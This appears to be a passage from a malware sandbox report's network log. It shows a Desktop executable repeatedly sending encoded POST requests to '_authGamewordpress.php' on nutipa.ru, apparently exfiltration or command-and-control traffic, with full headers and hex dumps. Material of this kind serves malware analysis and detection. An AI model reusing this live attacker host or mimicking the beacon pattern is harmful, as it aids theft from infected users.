                                                            Data Ascii: USCX_^]T]ZVQP_WPUQ^EZP[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$]?.^=:/\!?%?>3X44'>92>-W=?0.6^?%R/.F'#P
                                                            Dec 15, 2024 19:37:51.505918026 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:51.766484976 CET | 795 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:51 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lBQnQq62rMA1T0%2FhaAAxYGEMAIDGHh72hTfau95AjewAVOKdWQ2mJnnCiVX6ioZFJDRVEpxLrFSIV2tDt4bS8WPanHInzB3eq%2B4thVZR%2FnzBizZ1YZUCWbLymtE%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c1bfcad4217-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6793&min_rtt=1690&rtt_var=10841&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=34335&cwnd=239&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            69 | 192.168.2.4 | 49834 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:52.014276981 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:52.373028994 CET2536OUTData Raw: 55 55 43 51 5f 5d 58 5e 5d 5a 56 51 50 5c 57 56 55 52 5e 45 5a 54 5b 5e 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUCQ_]X^]ZVQP\WVUR^EZT[^\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y')-->;]",C?4/$Y%.'.>X$-9?U=/;.F'#P 7
                                                            Dec 15, 2024 19:37:53.104518890 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:53.347718000 CET | 801 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:53 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fh2irfLVZZhnKC9yCbplm1zwUw%2FjJ3qBj%2Br7m4xFdw5VQyf3NmrWRKBPMy1YILAUhsiBPUvXmPE65V1cL%2FKPMtXo4ou35%2B69UUyA6GymIlIgB%2BcduuK0%2BgLm5OI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c25eb710f64-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8358&min_rtt=1619&rtt_var=14086&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=26290&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            70 | 192.168.2.4 | 49835 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:53.584983110 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:53.936096907 CET2536OUTData Raw: 55 57 43 5d 5f 5a 5d 54 5d 5a 56 51 50 51 57 55 55 52 5e 44 5a 52 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UWC]_Z]T]ZVQPQWUUR^DZR[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$]?"Y>+X6D+.,#$Z'.=%%T)#3)=0:8+.F'#P
                                                            Dec 15, 2024 19:37:54.685503006 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:54.933007956 CET | 793 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:54 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CDQjHzBAyWvWhZt5YzbRea%2B8R0I5LMLD7iXxhmTbrjvSoFNusuP685%2B7VeHLT6z0bO%2FZH0Orc%2FjKivmDxmKNY7N3xz%2B2EBLrQG23QromU6EeZYodVrsMKymqWks%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c2fdbf6433f-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3988&min_rtt=1730&rtt_var=5165&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=73744&cwnd=218&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a
                                                            Data Ascii: 44W@T
                                                            Dec 15, 2024 19:37:55.127337933 CET5INData Raw: 30 0d 0a 0d 0a
                                                            Data Ascii: 0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            71 | 192.168.2.4 | 49836 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:55.391752958 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:55.748399019 CET2536OUTData Raw: 55 52 43 5e 5f 5e 5d 53 5d 5a 56 51 50 5f 57 52 55 52 5e 42 5a 50 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: URC^_^]S]ZVQP_WRUR^BZP[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'<="Z?*7!.C+(4?(Z'=:2>:*3?3=(#%S/.F'#P
                                                            Dec 15, 2024 19:37:56.492911100 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:56.729398012 CET | 798 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:56 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W44l74UXtM5jgXNQMxMY%2BXOyUhP5O%2B2OCGGSNsNYbvXa63B8W5UXgc69ChIsGCSFeJ7Epd7Nb%2FKQmVWOanj9lj0dyvYg6BQ9A%2BaBNC2rprB7CgyfoWB7UQGn%2BoI%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c3b2a8c43a4-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=6498&min_rtt=3910&rtt_var=6643&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=59303&cwnd=231&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            72 | 192.168.2.4 | 49837 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:56.776158094 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 1420
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:57.123029947 CET1420OUTData Raw: 50 51 43 5b 5f 5a 58 57 5d 5a 56 51 50 50 57 56 55 50 5e 41 5a 57 5b 5a 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PQC[_ZXW]ZVQPPWVUP^AZW[Z\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'?1>7!?:@)>(#'1>*^&==Q)'$>6]?)/+.F'#P
                                                            Dec 15, 2024 19:37:57.863766909 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:58.128935099 CET | 946 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:57 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hVPvTYBz9QELzWgH0VBEKWQmULF1IAUwbQncZJ6GgYKF%2F1xeYP3tYVVKYeh1nZQLUUF7ADwwndoKFcvp5%2B6%2FlWvnq5d4pNij04YtTeTGUeIvOBAszqFbB%2BFp43Q%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c43bd997292-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3291&min_rtt=1901&rtt_var=3494&sent=3&recv=7&lost=0&retrans=0&sent_bytes=25&recv_bytes=1740&delivery_rate=112092&cwnd=251&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 39 38 0d 0a 06 1f 3a 01 21 3a 26 54 23 3e 3f 0c 39 3c 0f 57 3f 1e 2c 08 33 22 29 5b 24 28 27 16 2a 3d 30 0a 26 29 2a 06 23 22 25 1c 3f 09 21 12 25 36 21 51 03 11 22 58 25 07 30 59 3d 39 34 16 26 31 01 14 31 3d 01 05 28 5e 3a 1d 24 01 23 1f 37 2e 3c 52 39 39 23 02 2b 04 37 16 2d 07 3a 1e 37 1c 2e 53 0c 17 26 01 3f 3a 3a 13 21 32 17 56 30 2c 34 0d 34 39 32 1d 3d 30 3c 51 33 33 23 57 30 58 3b 0e 20 30 2d 1a 25 03 22 5e 37 32 3d 08 2a 22 25 5c 20 05 2e 52 03 34 5d 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 98:!:&T#>?9<W?,3")[$('*=0&)*#"%?!%6!Q"X%0Y=94&11=(^:$#7.<R99#+7-:7.S&?::!2V0,4492=0<Q33#W0X; 0-%"^72=*"%\ .R4]T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            73 | 192.168.2.4 | 49838 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:56.900105953 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:37:57.250092983 CET2536OUTData Raw: 50 55 43 50 5f 58 58 5e 5d 5a 56 51 50 5d 57 53 55 51 5e 46 5a 5f 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PUCP_XX^]ZVQP]WSUQ^FZ_[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$\?[2)\+X!=(3 /4\1*%X9Q*Z0>%<#=,.F'#P 3
                                                            Dec 15, 2024 19:37:57.987832069 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:58.224349022 CET | 790 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:58 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=QgRgcPx9XYFAwL69gCyvQwwEQr0Vyh1dXizLyrR0yAaRqn5kVFFi6YMG0t7oppVosq7MFS6WJ4%2BUocu67ViToiCJU4IovpDuLJPz9DchjPAVC72OFicWBIPxIDk%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c447d7842c3-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3606&min_rtt=1862&rtt_var=4187&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=92294&cwnd=202&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            74 | 192.168.2.4 | 49839 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:37:58.582103968 CET | 296 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Dec 15, 2024 19:37:58.935688972 CET2536OUTData Raw: 55 55 43 5b 5a 5b 58 5f 5d 5a 56 51 50 5b 57 55 55 55 5e 41 5a 57 5b 53 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: UUC[Z[X_]ZVQP[WUUU^AZW[S\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$(-&_=: 5)(+#;1:1=0'[$6Y( >8;.F'#P +
                                                            Dec 15, 2024 19:37:59.659472942 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:37:59.892218113 CET | 803 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:37:59 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Sh7Zl%2Bd4jEnEh8rA4yTgGXLbN0TsF%2B7H1XLISH0%2B46ZeQXDSbOFPsfELStlMuxlwjTG%2BCP%2BiQTNPO2la8l581K6Ffw0OB%2BSUffPM9a9lL%2FUJsy3UT9ZoEUzBt2M%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c4eea3078e8-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=3884&min_rtt=2359&rtt_var=3935&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2832&delivery_rate=100260&cwnd=229&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            75 | 192.168.2.4 | 49840 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:38:00.131548882 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:00.482367992 CET2536OUTData Raw: 50 52 43 50 5f 57 58 5e 5d 5a 56 51 50 5a 57 54 55 50 5e 40 5a 50 5b 5c 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PRCP_WX^]ZVQPZWTUP^@ZP[\\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y'+-=/5Z6@( ?7&.=2-='Z'."=0"-;.F'#P /
                                                            Dec 15, 2024 19:38:01.226608992 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:01.481857061 CET | 793 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:01 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=rea1M8i3PWdWXhBMjr31aQnqC4W8ZFikARtlzoB2La3qb4s7tiQhHSJwJWkaOB09MF3QeG%2BQ%2FY1ufxWDhFuLHN2yiyVLxFFiWgAixjb3lUWtSOFCwmrek413KuQ%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c58bc0942ea-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=8516&min_rtt=1665&rtt_var=14327&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=25852&cwnd=142&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            76 | 192.168.2.4 | 49841 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:38:01.766807079 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:02.123197079 CET | 2536 | OUT | Data Raw: 55 52 43 5f 5f 57 5d 55 5d 5a 56 51 50 5a 57 51 55 5d 5e 41 5a 55 5b 5e 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: URC__W]U]ZVQPZWQU]^AZU[^\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$+*X>\;[5*C+$7?<\1X"X%>-)/3>*_?9S,.F'#P /
                                                            Dec 15, 2024 19:38:02.852874994 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:03.090897083 CET | 796 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:02 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
                                                            Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ky%2FDU%2Fx9mxV6RnbzxBxo1E8xNl6mqV1rIRD3eXQoiG5pZ2VewdPYHgOwo8KtbM%2FanrWlDpfh99Te8qm4MakSIUuTtZlJ6JbW0jQ9aykhHOUY5fd1rY3e9%2Bv1RbM%3D"}],"group":"cf-nel","max_age":604800}
                                                            NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                            Server: cloudflare
                                                            CF-RAY: 8f288c62db0d439a-EWR
                                                            alt-svc: h3=":443"; ma=86400
                                                            server-timing: cfL4;desc="?proto=TCP&rtt=4871&min_rtt=1808&rtt_var=6805&sent=4&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2856&delivery_rate=55477&cwnd=232&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                            Data Raw: 34 0d 0a 34 57 40 54 0d 0a 30 0d 0a 0d 0a
                                                            Data Ascii: 44W@T0


                                                            Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                            77 | 192.168.2.4 | 49843 | 104.21.64.130 | 80 | 7956 | C:\Users\user\Desktop\150bIjWiGH.exe
                                                            Timestamp | Bytes transferred | Direction | Data
                                                            Dec 15, 2024 19:38:03.340619087 CET | 320 | OUT | POST /_authGamewordpress.php HTTP/1.1
                                                            Content-Type: application/x-www-form-urlencoded
                                                            User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/95.0.4638.69 Safari/537.36 OPR/81.0.4196.60
                                                            Host: nutipa.ru
                                                            Content-Length: 2536
                                                            Expect: 100-continue
                                                            Connection: Keep-Alive
                                                            Dec 15, 2024 19:38:03.685527086 CET | 2536 | OUT | Data Raw: 50 57 43 50 5f 5f 58 53 5d 5a 56 51 50 50 57 5b 55 57 5e 49 5a 50 5b 58 5c 5d 58 5e 54 5c 59 5e 58 58 52 58 5e 53 52 55 42 56 57 5d 5d 54 5e 55 55 5d 5d 5b 58 5f 5a 5c 57 58 53 5d 58 50 55 58 58 5c 5f 5e 53 5d 50 53 5a 59 5d 57 5b 5b 5b 51 55 5f
                                                            Data Ascii: PWCP__XS]ZVQPPW[UW^IZP[X\]X^T\Y^XXRX^SRUBVW]]T^UU]][X_Z\WXS]XPUXX\_^S]PSZY]W[[[QU__ZP_U]SXPT]UQW_]Z\U]]]]VCVY]AT]\]VFQV\Z_]^__BZYU_UX_TR]SQQTD_ZZ\WXS][\]ZC^]YRXXXYB^ZSU]\V[T[WP^U[T[^]Y$Z<=-)/!Z>?$7?Y1X>]&9*U$%.&X+>-+.F'#P
                                                            Dec 15, 2024 19:38:04.429358959 CET | 25 | IN | HTTP/1.1 100 Continue
                                                            Dec 15, 2024 19:38:04.698626995 CET | 796 | IN | HTTP/1.1 200 OK
                                                            Date: Sun, 15 Dec 2024 18:38:04 GMT
                                                            Content-Type: text/html; charset=UTF-8
                                                            Transfer-Encoding: chunked
                                                            Connection: keep-alive
                                                            CF-Cache-Status: DYNAMIC
